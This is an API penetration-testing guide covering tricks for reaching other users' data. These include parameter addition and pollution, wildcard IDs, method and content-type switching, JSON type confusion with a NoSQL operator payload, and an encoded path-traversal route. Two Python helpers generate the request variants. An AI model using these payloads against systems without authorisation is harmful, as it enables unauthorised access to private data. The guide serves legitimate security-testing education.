# API Pentesting

## Tricks

### Public and private endpoints

Build a list of the public and private endpoints so you know which information should be confidential, then try to reach it in "unauthorized" ways (with no session, with a lower-privileged session, or as a different user).

### Patterns

Look for API patterns and use them to discover more endpoints. If you find `/api/albums/<album_id>/photos/<photo_id>`, try the same shape elsewhere, for example `/api/posts/<post_id>/comment/`. Use a fuzzer to discover these new endpoints.

### Add parameters

Something like the following might give you access to another user's photo album:

`/api/MyPictureList` → `/api/MyPictureList?user_id=<other_user_id>`

### Replace parameters

You can **fuzz parameters**, or reuse parameters **you have seen** on different endpoints, to try to access other information. For example, if you see:

`/api/albums?album_id=<album id>`

you could **replace** the `album_id` parameter with something completely different and potentially get other data:

`/api/albums?account_id=<account id>`

### Parameter pollution

`/api/account?id=<your account id>` → `/api/account?id=<your account id>&id=<admin's account id>`

Which of the duplicated values the server uses depends on its parsing library (first, last, or both), so the authorization check and the data lookup may not agree; try both orders.

### Wildcard parameter

Try the following symbols as wildcards: `*`, `%`, `_`, `.`

* /api/users/\*
* /api/users/%
* /api/users/\_
* /api/users/.

### HTTP request method change

Try the HTTP methods **GET, POST, PUT, DELETE, PATCH** and a non-existent one (e.g. **INVENTED**) to check whether the web server gives you unexpected information with them.
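The tricks above (add a parameter, replace a parameter name, parameter pollution, wildcard IDs, alternative methods) are all mutations of one known request, so they are easiest to apply systematically. The following is an added example, not code from the original page: it builds the candidate requests as data so they can be reviewed before being sent, and shows with Python's own query parsers why a polluted `id=<mine>&id=<admin>` must be tried in both orders. The endpoint `/api/albums`, the parameter names and the IDs are constructed sample values; `build_variants`, `first_value` and `last_value` are names chosen here.

```python
from dataclasses import dataclass
from urllib.parse import urlencode, parse_qs, parse_qsl

# Methods and wildcard symbols from the tricks above; INVENTED is a deliberately bogus verb.
METHODS = ["GET", "POST", "PUT", "DELETE", "PATCH", "INVENTED"]
WILDCARDS = ["*", "%", "_", "."]


@dataclass(frozen=True)
class Variant:
    """One candidate request. `query` is an ordered sequence of (name, value)
    pairs so duplicated names (parameter pollution) survive intact."""
    method: str
    path: str
    query: tuple
    note: str

    @property
    def url(self) -> str:
        # urlencode percent-encodes "*" and "%" in values; the server decodes them.
        # Path-segment wildcards are left raw, exactly as written on the page.
        return self.path + ("?" + urlencode(self.query) if self.query else "")


def build_variants(path, params, victim_id, extra_params=("user_id",), seen_params=()):
    """Return the request variants to try against one endpoint.

    path         -- endpoint under test, e.g. "/api/albums" (constructed sample)
    params       -- its normal parameters with the tester's own IDs, as a dict
    victim_id    -- an object/account ID belonging to another user
    extra_params -- names the endpoint does not advertise ("add parameters")
    seen_params  -- names observed on other endpoints ("replace parameters")
    """
    base = tuple(params.items())
    out = []

    # Add parameters: append a name the endpoint never asked for.
    for name in extra_params:
        if name not in params:
            out.append(Variant("GET", path, base + ((name, victim_id),), f"add {name}"))

    for known in params:
        # Replace parameters: swap the known name for one seen elsewhere.
        for seen in seen_params:
            if seen not in params:
                swapped = tuple((seen if k == known else k, v) for k, v in base)
                out.append(Variant("GET", path, swapped, f"replace {known} with {seen}"))
        # Parameter pollution, in both orders: parsers disagree on first vs last.
        out.append(Variant("GET", path, base + ((known, victim_id),), f"pollute {known}, victim last"))
        out.append(Variant("GET", path, ((known, victim_id),) + base, f"pollute {known}, victim first"))
        # Wildcard values in place of the ID.
        for w in WILDCARDS:
            wild = tuple((k, w if k == known else v) for k, v in base)
            out.append(Variant("GET", path, wild, f"wildcard {known}={w}"))

    # Wildcards as a path segment: /api/users/*
    for w in WILDCARDS:
        out.append(Variant("GET", f"{path}/{w}", (), f"wildcard path segment {w}"))

    # Every other method, including a non-existent one.
    for method in METHODS:
        if method != "GET":
            out.append(Variant(method, path, base, f"method {method}"))
    return out


def first_value(query_string, name):
    """What a first-wins parser sees (here: parse_qs()[name][0])."""
    return parse_qs(query_string)[name][0]


def last_value(query_string, name):
    """What a last-wins parser sees (here: dict(parse_qsl())[name])."""
    return dict(parse_qsl(query_string))[name]


if __name__ == "__main__":
    for v in build_variants("/api/albums", {"album_id": "1001"}, "2002", seen_params=("account_id",)):
        print(f"{v.method:8} {v.url:45} # {v.note}")
    polluted = "album_id=1001&album_id=2002"
    print("first-wins parser:", first_value(polluted, "album_id"))
    print("last-wins parser: ", last_value(polluted, "album_id"))
```

The two parser helpers are the check worth keeping in mind: if the authorization layer reads the first `id` and the data layer reads the last (or the other way round), one of the two pollution orders passes the check for your ID while fetching the victim's record. Sending the variants is left to whatever HTTP client you already use; compare status code, length and body against the baseline request.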
### Request content-type

Switch between the following content-types (adjusting the request body accordingly) to make the web server behave unexpectedly:

* **x-www-form-urlencoded** --> user=test
* **application/xml** --> <user>test</user>
* **application/json** --> {"user": "test"}

### Parameter types

If **JSON** data works, try sending unexpected data types such as:

* {"username": "John"}
* {"username": true}
* {"username": 1}
* {"username": \[true\]}
* {"username": \["John", true\]}
* {"username": {"$neq": "lalala"}}
* any other combination you can imagine

The last item sends an object where a string is expected; if the value reaches a NoSQL query unchanged it is interpreted as an operator (MongoDB's not-equal operator is spelled `$ne`).

If you can send **XML** data, check for [XXE injections](../../pentesting-web/xxe-xee-xml-external-entity.md).

If you send regular POST data, try sending arrays and dictionaries:

* username\[\]=John
* username\[$neq\]=lalala

### Play with routes

`/files/..%2f..%2f + victim ID + %2f + victim filename`

The URL-encoded `../` segments may pass the router's path normalization untouched and only be decoded by the file-serving handler, escaping the intended directory.

### Check possible versions

Old versions may still be in use and be more vulnerable than the latest endpoints:

* `/api/v1/login`
* `/api/v2/login`
* `/api/CharityEventFeb2020/user/pp/`
* `/api/CharityEventFeb2021/user/pp/`

## OWASP API Security Top 10

Read this document to learn how to **search for** and **exploit** the OWASP API Security Top 10 vulnerabilities: [https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)

## API Security Checklist

{% embed url="https://github.com/shieldfy/API-Security-Checklist" %}

## List of possible API endpoints

[https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)

## Tools

[https://github.com/imperva/automatic-api-attack-tool](https://github.com/imperva/automatic-api-attack-tool): Imperva's customizable API attack tool takes an API specification as input, generates attacks based on it and runs them.
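The content-type and parameter-type tricks above are one logical parameter set serialised in several ways. The following is an added example, not code from the original page: it produces the form, XML and JSON bodies for the same fields, the unexpected JSON types from the list (including the operator object), and the bracketed form keys (`username[]=John`, `username[$neq]=lalala`). The function names, the XML root element `request` and the sample value `John` are assumptions made here; the XML body is the one on which an XXE test would then be attempted.

```python
import json
from urllib.parse import urlencode
from xml.sax.saxutils import escape


def type_variants(value):
    """Unexpected JSON types for one field, taken from the list above, plus a
    NoSQL-style operator object. `value` is the legitimate original.
    The page writes the operator as $neq; MongoDB's own spelling is $ne."""
    return [True, 1, [True], [value, True], {"$neq": "lalala"}]


def form_encode(params):
    """application/x-www-form-urlencoded with PHP/Rails-style bracket keys:
    lists become name[]=v, dicts become name[key]=v. Brackets and "$" are
    percent-encoded on the wire; the framework decodes them back."""
    pairs = []
    for name, value in params.items():
        if isinstance(value, dict):
            pairs.extend((f"{name}[{sub}]", sub_value) for sub, sub_value in value.items())
        elif isinstance(value, list):
            pairs.extend((f"{name}[]", item) for item in value)
        else:
            pairs.append((name, value))
    return urlencode(pairs)


def xml_encode(params, root="request"):
    """application/xml, one element per field. The root element name is an
    assumption; real APIs usually expect a specific one."""
    items = "".join(f"<{k}>{escape(str(v))}</{k}>" for k, v in params.items())
    return f"<{root}>{items}</{root}>"


def body_variants(params):
    """Return (content_type, body) pairs carrying the same logical parameters."""
    out = [
        ("application/x-www-form-urlencoded", form_encode(params)),
        ("application/xml", xml_encode(params)),
        ("application/json", json.dumps(params)),
    ]
    # JSON type confusion: mutate one field at a time, keep the rest intact.
    for name, value in params.items():
        for alt in type_variants(value):
            out.append(("application/json", json.dumps({**params, name: alt})))
    # Form-encoded arrays and dictionaries: username[]=John, username[$neq]=lalala
    for name, value in params.items():
        out.append(("application/x-www-form-urlencoded", form_encode({**params, name: [value]})))
        out.append(("application/x-www-form-urlencoded", form_encode({**params, name: {"$neq": "lalala"}})))
    return out


if __name__ == "__main__":
    # Constructed sample input: a single login-style field.
    for content_type, body in body_variants({"username": "John"}):
        print(f"Content-Type: {content_type}\n{body}\n")
```

Send each pair with the matching `Content-Type` header and compare the responses against the plain JSON baseline: a 500 or a stack trace on the array or object variants usually means the value reached a layer (ORM, query builder, template) that assumed a string, and a 200 on a body type the endpoint is not documented to accept means a second parser is in play.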
[https://github.com/flipkart-incubator/Astra](https://github.com/flipkart-incubator/Astra): another tool for API testing.